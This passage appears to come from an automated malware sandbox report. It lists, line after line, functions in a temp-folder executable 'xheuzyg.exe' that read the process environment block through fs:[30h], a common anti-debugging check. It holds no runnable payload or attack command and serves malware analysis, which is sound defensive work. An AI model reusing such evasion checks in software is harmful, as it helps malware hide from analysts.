          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BA197 mov eax, dword ptr fs:[00000030h]4_2_015BA197
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BA197 mov eax, dword ptr fs:[00000030h]4_2_015BA197
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01600185 mov eax, dword ptr fs:[00000030h]4_2_01600185
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01664180 mov eax, dword ptr fs:[00000030h]4_2_01664180
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01664180 mov eax, dword ptr fs:[00000030h]4_2_01664180
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0167C188 mov eax, dword ptr fs:[00000030h]4_2_0167C188
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0167C188 mov eax, dword ptr fs:[00000030h]4_2_0167C188
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164019F mov eax, dword ptr fs:[00000030h]4_2_0164019F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164019F mov eax, dword ptr fs:[00000030h]4_2_0164019F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164019F mov eax, dword ptr fs:[00000030h]4_2_0164019F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164019F mov eax, dword ptr fs:[00000030h]4_2_0164019F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C2050 mov eax, dword ptr fs:[00000030h]4_2_015C2050
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EC073 mov eax, dword ptr fs:[00000030h]4_2_015EC073
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01646050 mov eax, dword ptr fs:[00000030h]4_2_01646050
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DE016 mov eax, dword ptr fs:[00000030h]4_2_015DE016
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DE016 mov eax, dword ptr fs:[00000030h]4_2_015DE016
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DE016 mov eax, dword ptr fs:[00000030h]4_2_015DE016
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DE016 mov eax, dword ptr fs:[00000030h]4_2_015DE016
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01656030 mov eax, dword ptr fs:[00000030h]4_2_01656030
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01644000 mov ecx, dword ptr fs:[00000030h]4_2_01644000
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]4_2_01662000
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]4_2_01662000
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]4_2_01662000
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]4_2_01662000
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]4_2_01662000
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]4_2_01662000
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]4_2_01662000
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01662000 mov eax, dword ptr fs:[00000030h]4_2_01662000
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BA020 mov eax, dword ptr fs:[00000030h]4_2_015BA020
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BC020 mov eax, dword ptr fs:[00000030h]4_2_015BC020
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016460E0 mov eax, dword ptr fs:[00000030h]4_2_016460E0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016020F0 mov ecx, dword ptr fs:[00000030h]4_2_016020F0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BC0F0 mov eax, dword ptr fs:[00000030h]4_2_015BC0F0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C80E9 mov eax, dword ptr fs:[00000030h]4_2_015C80E9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BA0E3 mov ecx, dword ptr fs:[00000030h]4_2_015BA0E3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016420DE mov eax, dword ptr fs:[00000030h]4_2_016420DE
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016580A8 mov eax, dword ptr fs:[00000030h]4_2_016580A8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016860B8 mov eax, dword ptr fs:[00000030h]4_2_016860B8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016860B8 mov ecx, dword ptr fs:[00000030h]4_2_016860B8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C208A mov eax, dword ptr fs:[00000030h]4_2_015C208A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B80A0 mov eax, dword ptr fs:[00000030h]4_2_015B80A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166437C mov eax, dword ptr fs:[00000030h]4_2_0166437C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0169634F mov eax, dword ptr fs:[00000030h]4_2_0169634F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01642349 mov eax, dword ptr fs:[00000030h]4_2_01642349
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01668350 mov ecx, dword ptr fs:[00000030h]4_2_01668350
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164035C mov eax, dword ptr fs:[00000030h]4_2_0164035C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164035C mov eax, dword ptr fs:[00000030h]4_2_0164035C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164035C mov eax, dword ptr fs:[00000030h]4_2_0164035C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164035C mov ecx, dword ptr fs:[00000030h]4_2_0164035C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164035C mov eax, dword ptr fs:[00000030h]4_2_0164035C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164035C mov eax, dword ptr fs:[00000030h]4_2_0164035C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168A352 mov eax, dword ptr fs:[00000030h]4_2_0168A352
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BC310 mov ecx, dword ptr fs:[00000030h]4_2_015BC310
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01698324 mov eax, dword ptr fs:[00000030h]4_2_01698324
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01698324 mov ecx, dword ptr fs:[00000030h]4_2_01698324
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01698324 mov eax, dword ptr fs:[00000030h]4_2_01698324
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01698324 mov eax, dword ptr fs:[00000030h]4_2_01698324
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E0310 mov ecx, dword ptr fs:[00000030h]4_2_015E0310
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA30B mov eax, dword ptr fs:[00000030h]4_2_015FA30B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA30B mov eax, dword ptr fs:[00000030h]4_2_015FA30B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA30B mov eax, dword ptr fs:[00000030h]4_2_015FA30B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]4_2_015CA3C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]4_2_015CA3C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]4_2_015CA3C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]4_2_015CA3C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]4_2_015CA3C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA3C0 mov eax, dword ptr fs:[00000030h]4_2_015CA3C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C83C0 mov eax, dword ptr fs:[00000030h]4_2_015C83C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C83C0 mov eax, dword ptr fs:[00000030h]4_2_015C83C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C83C0 mov eax, dword ptr fs:[00000030h]4_2_015C83C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C83C0 mov eax, dword ptr fs:[00000030h]4_2_015C83C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F63FF mov eax, dword ptr fs:[00000030h]4_2_015F63FF
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016463C0 mov eax, dword ptr fs:[00000030h]4_2_016463C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0167C3CD mov eax, dword ptr fs:[00000030h]4_2_0167C3CD
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DE3F0 mov eax, dword ptr fs:[00000030h]4_2_015DE3F0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DE3F0 mov eax, dword ptr fs:[00000030h]4_2_015DE3F0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DE3F0 mov eax, dword ptr fs:[00000030h]4_2_015DE3F0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016643D4 mov eax, dword ptr fs:[00000030h]4_2_016643D4
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016643D4 mov eax, dword ptr fs:[00000030h]4_2_016643D4
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]4_2_015D03E9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]4_2_015D03E9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]4_2_015D03E9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]4_2_015D03E9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]4_2_015D03E9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]4_2_015D03E9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]4_2_015D03E9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D03E9 mov eax, dword ptr fs:[00000030h]4_2_015D03E9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E3DB mov eax, dword ptr fs:[00000030h]4_2_0166E3DB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E3DB mov eax, dword ptr fs:[00000030h]4_2_0166E3DB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E3DB mov ecx, dword ptr fs:[00000030h]4_2_0166E3DB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E3DB mov eax, dword ptr fs:[00000030h]4_2_0166E3DB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B8397 mov eax, dword ptr fs:[00000030h]4_2_015B8397
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B8397 mov eax, dword ptr fs:[00000030h]4_2_015B8397
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B8397 mov eax, dword ptr fs:[00000030h]4_2_015B8397
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E438F mov eax, dword ptr fs:[00000030h]4_2_015E438F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E438F mov eax, dword ptr fs:[00000030h]4_2_015E438F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BE388 mov eax, dword ptr fs:[00000030h]4_2_015BE388
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BE388 mov eax, dword ptr fs:[00000030h]4_2_015BE388
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BE388 mov eax, dword ptr fs:[00000030h]4_2_015BE388
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C6259 mov eax, dword ptr fs:[00000030h]4_2_015C6259
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BA250 mov eax, dword ptr fs:[00000030h]4_2_015BA250
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01670274 mov eax, dword ptr fs:[00000030h]4_2_01670274
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01648243 mov eax, dword ptr fs:[00000030h]4_2_01648243
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01648243 mov ecx, dword ptr fs:[00000030h]4_2_01648243
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B826B mov eax, dword ptr fs:[00000030h]4_2_015B826B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0169625D mov eax, dword ptr fs:[00000030h]4_2_0169625D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0167A250 mov eax, dword ptr fs:[00000030h]4_2_0167A250
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0167A250 mov eax, dword ptr fs:[00000030h]4_2_0167A250
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C4260 mov eax, dword ptr fs:[00000030h]4_2_015C4260
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C4260 mov eax, dword ptr fs:[00000030h]4_2_015C4260
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C4260 mov eax, dword ptr fs:[00000030h]4_2_015C4260
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B823B mov eax, dword ptr fs:[00000030h]4_2_015B823B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA2C3 mov eax, dword ptr fs:[00000030h]4_2_015CA2C3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA2C3 mov eax, dword ptr fs:[00000030h]4_2_015CA2C3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA2C3 mov eax, dword ptr fs:[00000030h]4_2_015CA2C3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA2C3 mov eax, dword ptr fs:[00000030h]4_2_015CA2C3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA2C3 mov eax, dword ptr fs:[00000030h]4_2_015CA2C3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D02E1 mov eax, dword ptr fs:[00000030h]4_2_015D02E1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D02E1 mov eax, dword ptr fs:[00000030h]4_2_015D02E1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D02E1 mov eax, dword ptr fs:[00000030h]4_2_015D02E1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016962D6 mov eax, dword ptr fs:[00000030h]4_2_016962D6
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016562A0 mov eax, dword ptr fs:[00000030h]4_2_016562A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016562A0 mov ecx, dword ptr fs:[00000030h]4_2_016562A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016562A0 mov eax, dword ptr fs:[00000030h]4_2_016562A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016562A0 mov eax, dword ptr fs:[00000030h]4_2_016562A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016562A0 mov eax, dword ptr fs:[00000030h]4_2_016562A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016562A0 mov eax, dword ptr fs:[00000030h]4_2_016562A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE284 mov eax, dword ptr fs:[00000030h]4_2_015FE284
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE284 mov eax, dword ptr fs:[00000030h]4_2_015FE284
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01640283 mov eax, dword ptr fs:[00000030h]4_2_01640283
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01640283 mov eax, dword ptr fs:[00000030h]4_2_01640283
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01640283 mov eax, dword ptr fs:[00000030h]4_2_01640283
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D02A0 mov eax, dword ptr fs:[00000030h]4_2_015D02A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D02A0 mov eax, dword ptr fs:[00000030h]4_2_015D02A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C8550 mov eax, dword ptr fs:[00000030h]4_2_015C8550
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C8550 mov eax, dword ptr fs:[00000030h]4_2_015C8550
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F656A mov eax, dword ptr fs:[00000030h]4_2_015F656A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F656A mov eax, dword ptr fs:[00000030h]4_2_015F656A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F656A mov eax, dword ptr fs:[00000030h]4_2_015F656A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE53E mov eax, dword ptr fs:[00000030h]4_2_015EE53E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE53E mov eax, dword ptr fs:[00000030h]4_2_015EE53E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE53E mov eax, dword ptr fs:[00000030h]4_2_015EE53E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE53E mov eax, dword ptr fs:[00000030h]4_2_015EE53E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE53E mov eax, dword ptr fs:[00000030h]4_2_015EE53E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01656500 mov eax, dword ptr fs:[00000030h]4_2_01656500
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]4_2_015D0535
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]4_2_015D0535
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]4_2_015D0535
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]4_2_015D0535
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]4_2_015D0535
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0535 mov eax, dword ptr fs:[00000030h]4_2_015D0535
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]4_2_01694500
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]4_2_01694500
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]4_2_01694500
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]4_2_01694500
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]4_2_01694500
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]4_2_01694500
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694500 mov eax, dword ptr fs:[00000030h]4_2_01694500
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C65D0 mov eax, dword ptr fs:[00000030h]4_2_015C65D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA5D0 mov eax, dword ptr fs:[00000030h]4_2_015FA5D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA5D0 mov eax, dword ptr fs:[00000030h]4_2_015FA5D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE5CF mov eax, dword ptr fs:[00000030h]4_2_015FE5CF
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE5CF mov eax, dword ptr fs:[00000030h]4_2_015FE5CF
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FC5ED mov eax, dword ptr fs:[00000030h]4_2_015FC5ED
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FC5ED mov eax, dword ptr fs:[00000030h]4_2_015FC5ED
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]4_2_015EE5E7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]4_2_015EE5E7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]4_2_015EE5E7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]4_2_015EE5E7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]4_2_015EE5E7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]4_2_015EE5E7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]4_2_015EE5E7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE5E7 mov eax, dword ptr fs:[00000030h]4_2_015EE5E7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C25E0 mov eax, dword ptr fs:[00000030h]4_2_015C25E0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE59C mov eax, dword ptr fs:[00000030h]4_2_015FE59C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016405A7 mov eax, dword ptr fs:[00000030h]4_2_016405A7
